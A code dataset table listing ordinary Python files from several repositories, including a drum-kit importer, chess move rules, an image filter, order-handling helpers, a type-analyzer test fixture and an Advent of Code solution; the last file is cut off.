hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
57e9e749952419b13882858f912e11103e5702e3 | 263 | py | Python | part_1_read_test_dat.py | MOTWODAHS/cc_tools | bcf79bc62c4db06bc64622f118d62b171691e80d | [
"MIT"
] | null | null | null | part_1_read_test_dat.py | MOTWODAHS/cc_tools | bcf79bc62c4db06bc64622f118d62b171691e80d | [
"MIT"
] | null | null | null | part_1_read_test_dat.py | MOTWODAHS/cc_tools | bcf79bc62c4db06bc64622f118d62b171691e80d | [
"MIT"
] | null | null | null | import cc_dat_utils
# Part 1: load a CC level pack from the test .dat file and print it.
input_dat_file = "data/pfgd_test.dat"
# cc_dat_utils.make_cc_level_pack_from_dat() decodes the binary .dat file
# named by input_dat_file into a level-pack object; print the resulting data.
data = cc_dat_utils.make_cc_level_pack_from_dat(input_dat_file)
print(data)
57ea16b86e437b4ce502cfa0fbd2394638685369 | 4,808 | py | Python | src/gen_drum_kit/importer/importer_hydrogen.py | peter-zenk/genDrumkit | a74bae332443db6424be46ebd32b8fffeac14ce1 | [
"MIT"
] | 7 | 2020-06-25T15:36:17.000Z | 2022-01-09T21:43:27.000Z | src/gen_drum_kit/importer/importer_hydrogen.py | peter-zenk/genDrumkit | a74bae332443db6424be46ebd32b8fffeac14ce1 | [
"MIT"
] | 3 | 2022-01-09T20:44:52.000Z | 2022-02-02T10:43:23.000Z | src/gen_drum_kit/importer/importer_hydrogen.py | peter-zenk/genDrumkit | a74bae332443db6424be46ebd32b8fffeac14ce1 | [
"MIT"
] | 1 | 2020-08-16T18:17:26.000Z | 2020-08-16T18:17:26.000Z | '''
Created on Jun 14, 2020
@author: peter
'''
import sys
import re
import tarfile
from os import path
import xml.etree.ElementTree as ET
import logging
from gen_drum_kit.importer.importer_base import ImporterBase
from gen_drum_kit.builder.builder_hydrogen import Builder_Hydrogen
from gen_drum_kit.util import dir_exists
logger = logging.getLogger(__name__)
class ImporterHydrogen(ImporterBase):
    """Importer that reads in a Hydrogen drum kit DB.

    Accepts either a packed ``.h2drumkit`` archive (``params.HG_db``) or an
    already unpacked ``drumkit.xml`` (``params.HG_xml``).  Fatal problems are
    logged and terminate the program via ``sys.exit``.
    """

    def __init__(self, params):
        """Store the run-time parameters; the XML tree is loaded later by
        :meth:`importData`."""
        super().__init__(params)
        logger.debug("Running in debug mode ...")
        logger.debug("ImporterBase '%s' created.", __name__)
        self._xml = None  # ElementTree; assigned later in importData()

    def importData(self):
        """Unpack the kit if necessary, then parse drumkit.xml and the
        channel-map file."""
        self._prepare()

        # Load drumkit info from XML file and create a drumkit object
        logger.info("Loading Hydrogen XML file '%s'...", self._params.HG_xml)
        self._xml = self._read_xml(self._params.HG_xml)
        self._debug_print()  # only produces output in debug mode

        self._read_map_file()

    # private functions ----------------------
    def _createBuilder(self):
        """Create and return the builder that turns the parsed Hydrogen data
        into a drum kit."""
        logger.info("Creating drum kit from Hydrogen data.")
        return Builder_Hydrogen(params=self._params, xml=self._xml,
                                mapDB=self._channel_map)

    def _read_xml(self, HG_xml):
        """Parse *HG_xml* and strip its namespace; exits with status 2 on
        any parse/read error."""
        try:
            tree = ET.parse(HG_xml)
        except Exception:
            # was a bare "except:"; narrowed so Ctrl-C is not swallowed
            logger.error("Error reading XML from '%s'! Aborting ...", HG_xml)
            sys.exit(2)
        logger.info("XML file '%s' successfully read", HG_xml)
        self._xml_remove_namespace(tree)
        return tree

    @staticmethod
    def _xml_remove_namespace(tree):
        """Remove the default XML namespace prefix (``{...}``) from every
        tag in *tree*, in place."""
        root = tree.getroot()
        namespaces = re.findall(r"{.*}", root.tag)
        if not namespaces:
            return  # no namespace -> nothing to be done
        namespace = namespaces[0]
        logger.debug(namespace)
        nsl = len(namespace)
        # BUGFIX: Element.getiterator() was removed in Python 3.9;
        # Element.iter() is the supported equivalent.
        for elem in root.iter():
            if elem.tag.startswith(namespace):
                elem.tag = elem.tag[nsl:]
        return

    def _debug_print(self):
        """Log the XML tree at debug level, up to five levels deep."""
        # ET.dump(self._xml)
        root = self._xml.getroot()
        logger.debug("XML Root is: '%s'", root)
        self._debug_print_node(root, 1)

    @staticmethod
    def _debug_print_node(node, depth, max_depth=5):
        """Recursively log *node*'s children, one tab of indentation per
        nesting level (replaces five hand-written nested loops)."""
        if depth > max_depth:
            return
        for child in node:
            logger.debug("\t" * depth + "%s - %s", child.tag, child.text)
            ImporterHydrogen._debug_print_node(child, depth + 1, max_depth)

    def _prepare(self):
        """Unpack the packed Hydrogen DB first, if one was given."""
        if self._params.HG_db:
            self._extract_HG_db()

    def _extract_HG_db(self):
        """Extract the ``.h2drumkit`` archive into the temp directory and
        derive ``drumkit_name`` / ``src_dir`` / ``HG_xml`` from it.

        Exits with status 1 on any failure.
        """
        if not path.exists(self._params.HG_db):
            logger.warning("Hydrogen DB '%s' does not exists. Aborting ...", self._params.HG_db)
            logger.info("Try on unpacked kit (Hydrogen XML)!")
            sys.exit(1)

        # if kit name is not set use base name of HG DB file
        if not self._params.drumkit_name:
            self._params.drumkit_name = path.basename(self._params.HG_db).replace(".h2drumkit", "")
        self._params.src_dir = self._params.tmp_dir + "/" + self._params.drumkit_name
        self._params.HG_xml = self._params.src_dir + "/drumkit.xml"

        # unpack hydrogen file
        logger.info("Unpacking Hydrogen data file '%s' to '%s' ...", self._params.HG_db,
                    self._params.tmp_dir)
        try:  # open archive, could be gzipped tar or plain tar
            logger.debug("Assume it it is gzip'ed tar archive ...")
            tar = tarfile.open(self._params.HG_db, "r:gz")
        except Exception:
            logger.debug("Failed: Assume it is old style tar'ed archive ...")
            try:
                tar = tarfile.open(self._params.HG_db, "r")
            except Exception:
                logger.error("Failed to open Hydrogen data file. Aborting ...")
                sys.exit(1)
        try:  # extract
            logger.debug("Extracting ...")
            # NOTE(review): extractall() on an untrusted archive can write
            # outside tmp_dir (path traversal); consider the 'filter='
            # argument available since Python 3.12.
            tar.extractall(self._params.tmp_dir)
            tar.close()
        except Exception:
            logger.error("Failed to unpack Hydrogen data file. Aborting ...")
            sys.exit(1)

        # check if name from Hydrogen DB file matches unpacked directory name
        if not dir_exists(self._params.src_dir):
            logger.error("Name of drum kit '%s' seems to be incorrect! " +
                         "Please check the unpacked data in directory '%s'. Aborting ...",
                         self._params.drumkit_name, self._params.tmp_dir)
            sys.exit(1)
        self._params.clean_rm.append(self._params.src_dir)
| 34.84058 | 99 | 0.576955 | 4,419 | 0.919093 | 0 | 0 | 455 | 0.094634 | 0 | 0 | 1,307 | 0.271839 |
57eb7325fe9ef8d6594ce7350e80b8d6714ba595 | 3,094 | py | Python | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 7 | 2015-04-06T15:17:13.000Z | 2020-10-21T04:57:00.000Z | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | null | null | null | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 4 | 2016-05-16T17:53:08.000Z | 2020-11-28T17:18:50.000Z | import collections
# Test fixture for the icbd type analyzer (Python 2 syntax: note the bare
# "print l2" statement below).  The trailing comments appear to be
# machine-checked oracles rather than ordinary notes:
#   "# <col> <type>" seems to assert the type inferred for the expression
#   starting at column <col> of that line, and "# e <col>" an expected type
#   error at column <col>.  Do not reformat these lines: columns matter.

def unknown():
    raise Exception()

l = [1] # 0 [<int|str>]
l.append(2) # 0 [<int|str>] # 2 (<int|str>) -> None
l.append('')
l[0] = 1
l[0] = ""

l2 = list(l) # 0 [<int|str>]
l2 = sorted(l) # 0 [<int|str>]
x = collections.deque(l2).pop() # 0 <int|str>
l2 = reversed(l) # 0 iterator of <int|str>
l2 = {1:l}[1] # 0 [<int|str>]
l2 = {'':l}[1] # 0 [<int|str>] # e 5
l2 = (l, l)[0] # 0 [<int|str>]

l = range(5)
l2 = list(l) # 0 [int]
l2 = sorted(l) # 0 [int]
x = collections.deque(l2).pop() # 0 int
l2 = reversed(l) # 0 iterator of int
l2 = {1:l}[1] # 0 [int]
l2 = {'':l}[1] # 0 [int] # e 5
l2 = (l, l)[0] # 0 [int]

d = dict([(1,2), (3,4)]) # 0 {int:int}
d = dict([]) # 0 {<unknown>:<unknown>}
d = dict([1]) # 0 <unknown> # e 4
d = dict(1) # 0 <unknown> # e 4
d = dict(unknown()) # 0 {<unknown>:<unknown>}
d = dict({1:''}) # 0 {int:str}
d = dict(a=1) # 0 {str:int}

l = range(3) # 0 [<int|object>]
l.extend([object()])

s = set() # 0 set(int)
s.add(2) # 0 set(int) # 2 (int) -> None
s = set() # 0 set(<unknown>)
s = set(2) # e 4 # 0 set(<unknown>)
s = set('') # 0 set(str)

l = []
l[''] = 1 # e 0

def f(x): # 4 (int) -> str
    return ''*x
l1 = range(2) # 0 [int]
l2 = map(f, l1) # 0 [str]

s1 = "abc123" # 0 str
# filter special cases strings...
s2 = filter(str.isalpha, s1) # 0 str
s3 = ''.join(s2) # 0 str
s4 = filter(str.isalpha, [s1]) # 0 [str]

d = {1:2} # 0 {int:int}
d2 = d.copy() # 0 {<int|str>:<bool|int>}
d2[''] = True # 0 {<int|str>:<bool|int>}

d = {1:''} # 0 {int:str}
t = d.popitem() # 0 (int,str)
d.clear()

d = {1:2} # 0 {int:<int|str>}
x = d.setdefault(2, '') # 0 <int|str>

d = {1:2} # 0 {int:int}
x = d.get(2, '') # 0 <int|str>

s = set([1,2]) # 0 set(int)
s2 = s.difference(['']) # 0 set(int)
s = set([1,2]) # 0 set(int)
s2 = s.difference_update(['']) # 0 None

s = set([1, 2])
x = s.pop() # 0 int
s.remove('') # e 0
s.remove(0)

s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference(l) # 0 set(<int|str>)

s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference_update(l) # 0 None

s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.union(l) # 0 set(<int|str>)

s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.update(l) # 0 None

t1 = (1,) # 0 (int,)
t2 = ('',) # 0 (str,)
t3 = t1 + t2 # 0 (int,str)

s = set([''])
s.issubset([1]) # e 0
s.issuperset([1]) # e 0
s = set(['', 1])
s.issubset([1]) # e 0
s.issuperset([1])
s = set([1])
s.issubset([1, ''])
s.issuperset([1, '']) # e 0

def f9():
    r = range(5) # 4 [int]
    f = map(float, r) # 4 [float]
    m = max(f) # 4 float
    def f(x, y): # 8 (str,int) -> [str]
        return [x] * y
    l = map(f, "aoeu", range(4)) # 4 [[str]]

def f10():
    def is_divisible(x, k): # 8 (int,int) -> bool
        return (x%k) == 0
    l = filter(lambda x:is_divisible(x, 3), range(100)) # 4 [int]
    l2 = filter(None, range(10)) # 4 [int]
    print l2
    l3 = filter(None, "") # 4 str
    l4 = filter(None, [""]) # 4 [str]

if 1:
    l = ''
else:
    l = [1]
l5 = filter(None, l) # 4 <[int]|str> # 22 <[int]|str>
| 21.486111 | 65 | 0.486102 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,222 | 0.394958 |
57ecf565cf5dcf9d17a6be622ca1dec561a24016 | 2,001 | py | Python | pylab/image/restoration/blind_deconv.py | N8Grant/Blind-Deconvolution-Python | a5e18e2b68b1cdd81a35d2db07b66d735aceac15 | [
"MIT"
] | null | null | null | pylab/image/restoration/blind_deconv.py | N8Grant/Blind-Deconvolution-Python | a5e18e2b68b1cdd81a35d2db07b66d735aceac15 | [
"MIT"
] | null | null | null | pylab/image/restoration/blind_deconv.py | N8Grant/Blind-Deconvolution-Python | a5e18e2b68b1cdd81a35d2db07b66d735aceac15 | [
"MIT"
] | null | null | null | import matlab.engine
import matlab
import numpy as np
import PIL
import matplotlib.pyplot as plt
import sys
print(sys.version_info[0:2])
# The MATLAB Engine API for Python only ships bindings for specific CPython
# versions, so bail out early on anything other than 3.6-3.8.
if sys.version_info[0:2] != (3, 8) and sys.version_info[0:2] != (3, 7) and sys.version_info[0:2] != (3, 6):
    raise Exception('Requires python 3.6, 3.7, or 3.8')
# Start one shared MATLAB session at import time (this is slow — several
# seconds); every call below reuses it.
eng = matlab.engine.start_matlab()
def blind_deconvolution(image, kernel_size=3, num_iterations=30, weighted=False, edge_weight=.08):
    """Deblur *image* with MATLAB's blind deconvolution (``deconvblind``).

    Parameters
    ----------
    image : str | PIL.Image.Image | numpy.ndarray
        Path to an image file, a PIL image, or a pixel array; it is
        converted to grayscale before deconvolution.
    kernel_size : int
        Side length of the initial all-ones PSF estimate.
    num_iterations : int
        Number of deconvblind iterations.
    weighted : bool
        If True, damp restoration along strong edges using a dilated
        Sobel edge mask.
    edge_weight : float
        Threshold passed to MATLAB's ``edge()`` when building the mask.

    Returns
    -------
    numpy.ndarray
        The restored grayscale image.
    """
    # --- normalize the input to a grayscale PIL image -------------------
    if isinstance(image, str):
        # URL/path to an image file
        image = PIL.Image.open(image)
    elif isinstance(image, np.ndarray):
        # raw pixel array
        image = PIL.Image.fromarray(image)
    elif not isinstance(image, PIL.Image.Image):
        # BUGFIX: the original compared type(image) against the PIL.Image
        # *module*, which is never true, so PIL image objects fell through
        # to this error branch.
        raise Exception('Input was of type ' + str(type(image)) + '. Must be a URL to an image, a PIL Image object, or an np array')
    image = PIL.ImageOps.grayscale(image)

    # --- optional edge-based weight mask --------------------------------
    if weighted:
        # NOTE(review): 'image' is still a PIL image at this point; this
        # assumes eng.edge() accepts it — confirm against the engine bridge.
        weight = eng.edge(image, "sobel", edge_weight)
        se = eng.strel("disk", 2)
        weight = 1 - matlab.double(eng.imdilate(weight, se))

    # --- convert inputs to MATLAB matrices ------------------------------
    # matlab.double() accepts a nested Python list directly, so the
    # original row-by-row conversion loops are unnecessary.
    start_kernel = matlab.double(np.ones((kernel_size, kernel_size)).tolist())
    image = matlab.double(np.asarray(image).tolist())

    # --- run blind deconvolution ----------------------------------------
    if weighted:
        deconvolved = eng.deconvblind(image, start_kernel, num_iterations, weight)
    else:
        # BUGFIX: num_iterations was silently ignored in the unweighted path.
        deconvolved = eng.deconvblind(image, start_kernel, num_iterations)
    return np.asarray(deconvolved).squeeze()
57ef2758e6f78fd8c86e719186446c008e2338ee | 6,642 | py | Python | chess-ai-master/game/rules.py | explodicus/intelliSah | acbec81a58292b788e2c7c0c7ea1ea04572a072f | [
"MIT"
] | null | null | null | chess-ai-master/game/rules.py | explodicus/intelliSah | acbec81a58292b788e2c7c0c7ea1ea04572a072f | [
"MIT"
] | null | null | null | chess-ai-master/game/rules.py | explodicus/intelliSah | acbec81a58292b788e2c7c0c7ea1ea04572a072f | [
"MIT"
] | null | null | null | from collections import defaultdict
import pieces
class RulesEnforcer(object):
    """
    Enforces the rules of the game.

    Examines a move and determines whether it is a valid move or not.
    Chess coordinates ('a1'..'h8') are translated to/from [row, col]
    indices into an 8x8 board array whose row 0 is rank 8.
    """

    # File letter ('a'..'h') -> 0-based column index.
    letter_dict = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7}
    pos_letters = letter_dict.keys()
    pos_nums = [1, 2, 3, 4, 5, 6, 7, 8]
    # Column index -> file letter.
    # BUGFIX: .items() instead of the Python-2-only .iteritems(), which
    # raised AttributeError at class-definition time on Python 3.
    letter_dict_rev = dict((v, k) for k, v in letter_dict.items())
    possible_pieces = ['p', 'r', 'n', 'b', 'q', 'k']

    def __init__(self):
        pass

    @staticmethod
    def check_square(chessboard, coordinate):
        """Return whatever occupies *coordinate* (e.g. 'a2') on the board.

        Useful for a variety of purposes (move generation, collision
        checks, ...).
        """
        mycord = RulesEnforcer.coordinate_mapper(coordinate)
        first = mycord[0]
        second = mycord[1]
        return chessboard[first][second]

    @staticmethod
    def possible_moves(chessboard, color, piece, coordinate):
        """Return the possible moves of *piece* of *color* standing at
        *coordinate* (either 'a2' or a [row, col] pair).

        Output: list of lists of possible moves, delegated to the piece
        classes in the ``pieces`` module; "invalid inputs!" for an unknown
        piece letter.
        """
        # Accept an array coordinate as well as a chess coordinate.
        if isinstance(coordinate, list):
            coordinate = RulesEnforcer.coordinate_mapper_reverse(coordinate)

        # Break the coordinate into [file-letter, rank-number].
        cords = list(coordinate)
        cords[1] = int(cords[1])

        if piece == 'p':
            pos_moves = pieces.Pawn.moves(cords, color, chessboard)
        elif piece == 'r':
            pos_moves = pieces.Rook.moves(cords, color, chessboard)
        elif piece == 'n':
            pos_moves = pieces.Knight.moves(cords, color, chessboard)
        elif piece == 'b':
            pos_moves = pieces.Bishop.moves(cords, color, chessboard)
        elif piece == "q":
            pos_moves = pieces.Queen.moves(cords, color, chessboard)
        elif piece == "k":
            pos_moves = pieces.King.moves(cords, color, chessboard)
        else:
            return "invalid inputs!"
        return pos_moves

    @staticmethod
    def all_possible_moves(chessboard, color):
        """Generate every possible move for *color* ('w' or 'b') on the
        given 8x8 chessboard.

        Output: dict mapping a piece's chess coordinate to its list of
        possible moves (pieces with no moves are omitted).
        """
        all_moves = defaultdict()
        for cor1, row in enumerate(chessboard):
            for cor2, square in enumerate(row):
                if square.split('-')[0] == color:
                    piece = square.split('-')[1]
                    coordinate = [cor1, cor2]
                    moves = RulesEnforcer.possible_moves(chessboard, color, piece, coordinate)
                    if moves:
                        all_moves[RulesEnforcer.coordinate_mapper_reverse(coordinate)] = moves
        return all_moves

    @staticmethod
    def remove_outofbound_moves(pos_moves):
        """Remove moves that fall outside the board.

        Input/output: list of [file-letter, rank-number] moves; the list is
        filtered in place and also returned.
        """
        to_remove = []
        for i in range(len(pos_moves)):
            if pos_moves[i][0] not in RulesEnforcer.pos_letters or pos_moves[i][1] not in RulesEnforcer.pos_nums:
                to_remove.append(pos_moves[i])
        for move in to_remove:
            pos_moves.remove(move)
        return pos_moves

    @staticmethod
    def collision_detection(move, color, chessboard):
        """Classify the square *move* (e.g. 'a7') relative to *color*.

        Returns 'friend', 'enemy' or 'empty'; returns False when the
        coordinate cannot be mapped or indexed.
        """
        try:
            move = RulesEnforcer.coordinate_mapper(move)
        except Exception:
            return False
        x = move[0]
        y = move[1]
        try:
            piece = chessboard[x][y]
        except Exception:
            return False
        occupant_color = piece.split('-')[0]
        if occupant_color == color:
            return "friend"
        if occupant_color in ('w', 'b'):
            return "enemy"
        return "empty"

    @staticmethod
    def move_allowed(move, chessboard):
        """Determine if *move* is allowed on *chessboard* (not yet
        implemented)."""
        pass

    @staticmethod
    def coordinate_mapper(mycoordinate):
        """Map a chess coordinate (e.g. 'a5') to its [row, col] array
        indices, e.g. 'a5' -> [3, 0] (row 0 is rank 8)."""
        mycoordinate = list(mycoordinate)
        starthor = RulesEnforcer.letter_dict[mycoordinate[0]]
        startver = 7 - (int(mycoordinate[1]) - 1)
        return [startver, starthor]

    @staticmethod
    def coordinate_mapper_reverse(myarray):
        """Inverse of :meth:`coordinate_mapper`: map a [row, col] pair to a
        chess coordinate string, e.g. [7, 0] -> 'a1'."""
        first_cor = RulesEnforcer.letter_dict_rev[myarray[1]]   # file letter
        second_cor = 8 - myarray[0]                             # rank number
        return str(first_cor) + str(second_cor)

    @staticmethod
    def legal_move_checker(start, finish):
        """Check if a move is legal or not based on the type of piece (not
        yet implemented)."""
        pass
57f2007543d3878ef0bed9620dac66d11e435984 | 178 | py | Python | eyed/rpc/bacnetd/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | null | null | null | eyed/rpc/bacnetd/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 55 | 2017-12-21T15:20:36.000Z | 2019-01-20T02:49:41.000Z | eyed/rpc/bacnetd/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 3 | 2018-05-18T09:02:36.000Z | 2019-12-29T10:27:44.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from bacnetd import SingleBACnetdService
from bacnetd import BACnetdService
# Names re-exported by ``from eyed.rpc.bacnetd import *``.
# BUGFIX: __all__ entries must be attribute-name *strings*; listing the
# objects themselves makes a star-import raise TypeError.
__all__ = [
    "SingleBACnetdService",
    "BACnetdService",
]
| 16.181818 | 40 | 0.752809 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 44 | 0.247191 |
57f2ae3f2e4e218865d07977bbf3e1de0603e097 | 2,280 | py | Python | gotham.py | amirothman/audio-visualization | 3a5efe97a1d98de06e84296f97081cd2d74fe9e2 | [
"MIT"
] | null | null | null | gotham.py | amirothman/audio-visualization | 3a5efe97a1d98de06e84296f97081cd2d74fe9e2 | [
"MIT"
] | null | null | null | gotham.py | amirothman/audio-visualization | 3a5efe97a1d98de06e84296f97081cd2d74fe9e2 | [
"MIT"
] | null | null | null | from skimage.util import img_as_float
from skimage import io, filters
# from skimage.viewer import ImageViewer
import numpy as np
def split_image_into_channels(image):
    """Return the red, green and blue planes of an RGB image as a tuple."""
    return image[:, :, 0], image[:, :, 1], image[:, :, 2]
def merge_channels(red, green, blue):
    """Stack three color planes back into a single image along a new
    trailing axis (H x W planes -> H x W x 3 image)."""
    planes = [red, green, blue]
    return np.stack(planes, axis=2)
def sharpen(image, a, b):
    """Unsharp mask: scale the image by *a*, subtract *b* times a heavy
    Gaussian blur of it, and clamp the result into [0, 1]."""
    smoothed = filters.gaussian(image, sigma=10, multichannel=True)
    return np.clip(a * image - b * smoothed, 0, 1.0)
def channel_adjust(channel, values):
    """Remap *channel* intensities through a piecewise-linear curve.

    *values* are the curve's output samples at evenly spaced inputs over
    [0, 1]; each pixel is linearly interpolated through that curve.  The
    result has the same shape as the input channel.
    """
    original_shape = channel.shape
    # np.interp works on 1-D data, so flatten first and restore the shape
    # at the end.  The curve's x-coordinates are evenly spaced over [0, 1].
    curve_inputs = np.linspace(0, 1, len(values))
    remapped = np.interp(channel.flatten(), curve_inputs, values)
    return remapped.reshape(original_shape)
def gotham(
    original_image,
    r_boost_upper=1,
    b_adjusted_upper=1,
    blurriness=1.3,
    subtraction=0.3,
    amount_bluer_blacks=0.03,
):
    """Apply a Gotham-style filter: ramp the red channel, lift the blacks
    toward blue, sharpen, then stretch the blue channel."""
    img = img_as_float(original_image)
    red, green, blue = split_image_into_channels(img)

    # Remap red through a linear ramp ending at r_boost_upper.
    boosted_red = channel_adjust(red, np.linspace(0, r_boost_upper))

    # Push the blacks slightly toward blue, clamped to the valid range.
    shifted_blue = np.clip(blue + amount_bluer_blacks, 0, 1.0)
    bluer = merge_channels(boosted_red, green, shifted_blue)

    # Unsharp mask controlled by blurriness and subtraction weight.
    crisp = sharpen(bluer, blurriness, subtraction)

    red, green, blue = split_image_into_channels(crisp)
    # Stretch blue through a linear ramp ending at b_adjusted_upper.
    final_blue = channel_adjust(blue, np.linspace(0, b_adjusted_upper))
    return merge_channels(red, green, final_blue)
if __name__ == "__main__":
    # Demo: apply the Gotham filter to a sample image and save the result.
    original_image = io.imread("data/input/sample.jpg")
    output = gotham(original_image, b_adjusted_upper=3)
    io.imsave("data/output/image-experiment/gotham.jpg", output)
| 30 | 78 | 0.705263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 651 | 0.285526 |
57f6365978e8a716c23c881a108a840cc548fa4a | 2,116 | py | Python | backend/backend/integration_utils.py | kaipietila/CookOS | b28f91cf5a750303a27e2e4589ea5a6ed271d295 | [
"MIT"
] | null | null | null | backend/backend/integration_utils.py | kaipietila/CookOS | b28f91cf5a750303a27e2e4589ea5a6ed271d295 | [
"MIT"
] | null | null | null | backend/backend/integration_utils.py | kaipietila/CookOS | b28f91cf5a750303a27e2e4589ea5a6ed271d295 | [
"MIT"
] | null | null | null | from datetime import datetime
from backend.backend.classes_main import Order, OrderItemStateUpdate, OrderUpdate, StatusHistory
from backend.backend.exceptions import NoOrderFoundException
from backend.backend.repository import get_order_by_id, update_items, update_order_status, get_orders, create_order
from backend.backend.delivery_integration import update_delivery_provider
from backend.backend.schemas import OrderSchema
async def fetch_orders():
    """Return every order from the repository."""
    return await get_orders()
async def create_new_order(order_dict: OrderSchema):
    """Persist a new order and return the id it was stored under."""
    return await create_order(order_dict)
async def create_new_status_history(new_state: str):
    """Build a StatusHistory entry for *new_state*, stamped with the
    current wall-clock time."""
    return StatusHistory(
        response='',
        source=1,  # source 1 == restaurant
        status=new_state,
        timeStamp=str(datetime.now()),
    )
async def update_order_state(update_data: OrderUpdate, existing_order: Order):
    """Move *existing_order* to the update's new state, record the
    transition in its status history, and persist the change."""
    existing_order.status = update_data.new_order_state
    history_entry = await create_new_status_history(update_data.new_order_state)
    existing_order.status_history.append(history_entry)
    await update_order_status(existing_order)
async def update_state(order_id: str, update_data: OrderUpdate):
    """Apply a state transition to the order identified by *order_id*.

    Raises NoOrderFoundException when no such order exists.
    """
    existing_order = await get_order_by_id(order_id)
    if not existing_order:
        raise NoOrderFoundException(f'Order by id {order_id} not found')
    await update_order_state(update_data, existing_order)
    # The delivery provider is kept in sync whenever an order's status changes.
    update_delivery_provider()
async def update_item_state(order_id: str, update_data: OrderItemStateUpdate):
    """Apply an item-level state update to the order identified by
    *order_id*; raises NoOrderFoundException when it does not exist."""
    existing_order = await get_order_by_id(order_id)
    if not existing_order:
        raise NoOrderFoundException(f'Order by id {order_id} not found')
    await update_item_list(update_data, existing_order)
async def update_item_list(update_data: OrderItemStateUpdate, existing_order: Order):
    """Set the new state on every order item whose name matches the
    update, then persist the item list."""
    for line_item in existing_order.items:
        if line_item.name == update_data.item_name:
            line_item.status = update_data.new_state
    await update_items(existing_order)
| 40.692308 | 115 | 0.778828 | 0 | 0 | 0 | 0 | 0 | 0 | 1,675 | 0.791588 | 151 | 0.071361 |
57f817e2249400abb14e5d1810b119046f3d3c71 | 425 | py | Python | 17b.py | znuxor/adventofcode2017 | 79d0df07f24ea8d2793df3b1c853a85b760791c1 | [
"BSD-3-Clause"
] | null | null | null | 17b.py | znuxor/adventofcode2017 | 79d0df07f24ea8d2793df3b1c853a85b760791c1 | [
"BSD-3-Clause"
] | null | null | null | 17b.py | znuxor/adventofcode2017 | 79d0df07f24ea8d2793df3b1c853a85b760791c1 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from collections import deque
def value_after_zero(step, insertions):
    """Return the value sitting immediately after 0 in the spinlock buffer
    after *insertions* insertions with the given *step* size.

    The original solution materialized the whole 50-million-element deque
    and rotated it on every insertion, which is accidentally quadratic.
    Value 0 never moves from the logical front of the circular buffer, so
    it suffices to track the insertion position arithmetically and remember
    the last value written at position 1 (i.e. right after 0).
    """
    position = 0
    after_zero = None
    for value in range(1, insertions + 1):
        # The buffer currently holds `value` elements; step forward and
        # insert after the landing spot.
        position = (position + step) % value + 1
        if position == 1:  # inserted directly after 0
            after_zero = value
    return after_zero


puzzle_input = 377
# puzzle_input = 3  # example input

if __name__ == "__main__":
    # Guarded so importing this module stays cheap.
    print(value_after_zero(puzzle_input, 50000000))
| 23.611111 | 55 | 0.757647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 63 | 0.148235 |
57fba0e21b454e1612fd2ab00c1169a35e150463 | 1,524 | py | Python | aiobotocore/configprovider.py | vemel/aiobotocore | b7726a4c45b6cdc0a8bf679191ce9c31eb7bd167 | [
"Apache-2.0"
] | null | null | null | aiobotocore/configprovider.py | vemel/aiobotocore | b7726a4c45b6cdc0a8bf679191ce9c31eb7bd167 | [
"Apache-2.0"
] | null | null | null | aiobotocore/configprovider.py | vemel/aiobotocore | b7726a4c45b6cdc0a8bf679191ce9c31eb7bd167 | [
"Apache-2.0"
] | null | null | null | from botocore.configprovider import os, SmartDefaultsConfigStoreFactory
class AioSmartDefaultsConfigStoreFactory(SmartDefaultsConfigStoreFactory):
    """Async port of botocore's SmartDefaultsConfigStoreFactory: resolving
    the 'auto' defaults mode may await the IMDS region provider."""

